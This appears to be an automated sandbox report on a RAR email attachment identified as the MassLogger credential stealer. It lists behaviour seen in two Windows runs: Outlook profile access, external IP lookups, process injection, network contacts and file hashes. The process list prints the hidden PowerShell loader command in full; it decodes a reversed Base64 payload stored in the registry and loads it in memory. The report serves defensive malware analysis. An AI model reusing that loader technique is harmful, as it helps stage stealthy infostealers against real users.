Analysis Overview
SHA256
0b6f160d8baf8abce7f7f540cf6d70bd94adc28257c294bacf7476c30518d40a
Threat Level: Known bad
The file Attachment.rar was found to be: Known bad.
Malicious Activity Summary
Masslogger family
MassLogger
Command and Scripting Interpreter: PowerShell
Checks computer location settings
Looks up external IP address via web service
Accesses Microsoft Outlook profiles
Suspicious use of SetThreadContext
System Location Discovery: System Language Discovery
Enumerates physical storage devices
Uses Task Scheduler COM API
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
outlook_office_path
Suspicious use of AdjustPrivilegeToken
outlook_win_path
MITRE ATT&CK
Enterprise Matrix V16
Analysis: static1
Detonation Overview
Reported
2025-07-04 12:03
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2025-07-04 12:03
Reported
2025-07-04 12:06
Platform
win10v2004-20250502-en
Max time kernel
143s
Max time network
142s
Command Line
Signatures
MassLogger
Masslogger family
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | checkip.dyndns.org | N/A | N/A |
| N/A | reallyfreegeoip.org | N/A | N/A |
| N/A | reallyfreegeoip.org | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2364 set thread context of 3684 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | N/A |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\light6645537.vbe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command $r='HKCU:\Software\YSSUOWOXajxtsHt';$v='test';$d=gp $r;$a=[Convert]::FromBase64String(($d.$v|%{$_[-1..-($_.Length)]}) -join '');[System.Reflection.Assembly]::Load($a);[hem.hem]::hem($r.Split('\')[-1])
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Roaming\YSSUOWOXajxtsHt.VBS"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | checkip.dyndns.org | udp |
| DE | 193.122.6.168:80 | checkip.dyndns.org | tcp |
| US | 8.8.8.8:53 | reallyfreegeoip.org | udp |
| US | 104.21.80.1:443 | reallyfreegeoip.org | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.180.3:80 | c.pki.goog | tcp |
Files
memory/2364-2-0x000001FCD6B90000-0x000001FCD6BA0000-memory.dmp
memory/2364-1-0x000001FCD6B90000-0x000001FCD6BA0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_iqcpt1ye.f54.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2364-12-0x000001FCBE5E0000-0x000001FCBE602000-memory.dmp
memory/2364-13-0x000001FCBCD60000-0x000001FCBCD6A000-memory.dmp
memory/2364-14-0x000001FCD6B70000-0x000001FCD6B7A000-memory.dmp
memory/3684-15-0x0000000000D10000-0x0000000000D2C000-memory.dmp
memory/3684-18-0x00000000056D0000-0x0000000005C74000-memory.dmp
memory/3684-19-0x0000000005200000-0x000000000529C000-memory.dmp
memory/3684-20-0x00000000063E0000-0x0000000006472000-memory.dmp
memory/3684-21-0x0000000006390000-0x00000000063E0000-memory.dmp
memory/3684-22-0x0000000006750000-0x0000000006912000-memory.dmp
memory/3684-23-0x00000000066F0000-0x00000000066FA000-memory.dmp
C:\Users\Admin\AppData\Roaming\YSSUOWOXajxtsHt.VBS
| MD5 | 1cacd0362bf0f7c175193309f29b89b1 |
| SHA1 | 9806970450b0294338bc13fd80b7ae56841d24b0 |
| SHA256 | f9dd2982f5735013c18de076016a6a603ce7d3010be26c011117a9cbbef1d778 |
| SHA512 | a85146b5d09f8865f95c8f6f3e4ad0bd091d1b2b39d56c1a5fbf823a344daf208f8f59a081af71989efe9b20a0de3d147cb89271a5dc9a34b8b505a8333aa507 |
Analysis: behavioral2
Detonation Overview
Submitted
2025-07-04 12:03
Reported
2025-07-04 12:06
Platform
win11-20250502-en
Max time kernel
144s
Max time network
111s
Command Line
Signatures
MassLogger
Masslogger family
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3518521428-3897247806-4080064211-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3518521428-3897247806-4080064211-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3518521428-3897247806-4080064211-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | checkip.dyndns.org | N/A | N/A |
| N/A | reallyfreegeoip.org | N/A | N/A |
| N/A | reallyfreegeoip.org | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3892 set thread context of 4040 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3518521428-3897247806-4080064211-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3518521428-3897247806-4080064211-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | N/A |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\light6645537.vbe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command $r='HKCU:\Software\YSSUOWOXajxtsHt';$v='test';$d=gp $r;$a=[Convert]::FromBase64String(($d.$v|%{$_[-1..-($_.Length)]}) -join '');[System.Reflection.Assembly]::Load($a);[hem.hem]::hem($r.Split('\')[-1])
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Roaming\YSSUOWOXajxtsHt.VBS"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | checkip.dyndns.org | udp |
| JP | 132.226.8.169:80 | checkip.dyndns.org | tcp |
| US | 104.21.112.1:443 | reallyfreegeoip.org | tcp |
| US | 52.111.227.11:443 | tcp |
Files
memory/3892-1-0x00007FF817973000-0x00007FF817975000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_figmuiqx.hbx.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3892-10-0x0000019F31710000-0x0000019F31732000-memory.dmp
memory/3892-11-0x00007FF817970000-0x00007FF818432000-memory.dmp
memory/3892-12-0x00007FF817970000-0x00007FF818432000-memory.dmp
memory/3892-13-0x00007FF817970000-0x00007FF818432000-memory.dmp
memory/3892-14-0x0000019F19440000-0x0000019F1944A000-memory.dmp
memory/3892-15-0x0000019F31700000-0x0000019F3170A000-memory.dmp
memory/4040-16-0x0000000000540000-0x000000000055C000-memory.dmp
memory/4040-19-0x00000000751AE000-0x00000000751AF000-memory.dmp
memory/4040-20-0x00000000054F0000-0x0000000005A96000-memory.dmp
memory/4040-21-0x0000000004FE0000-0x000000000507C000-memory.dmp
memory/4040-22-0x0000000006000000-0x0000000006092000-memory.dmp
memory/4040-23-0x0000000005FB0000-0x0000000006000000-memory.dmp
memory/3892-24-0x00007FF817970000-0x00007FF818432000-memory.dmp
memory/4040-25-0x0000000006370000-0x0000000006532000-memory.dmp
memory/4040-26-0x0000000006300000-0x000000000630A000-memory.dmp
memory/4040-27-0x00000000751AE000-0x00000000751AF000-memory.dmp
C:\Users\Admin\AppData\Roaming\YSSUOWOXajxtsHt.VBS
| MD5 | 1cacd0362bf0f7c175193309f29b89b1 |
| SHA1 | 9806970450b0294338bc13fd80b7ae56841d24b0 |
| SHA256 | f9dd2982f5735013c18de076016a6a603ce7d3010be26c011117a9cbbef1d778 |
| SHA512 | a85146b5d09f8865f95c8f6f3e4ad0bd091d1b2b39d56c1a5fbf823a344daf208f8f59a081af71989efe9b20a0de3d147cb89271a5dc9a34b8b505a8333aa507 |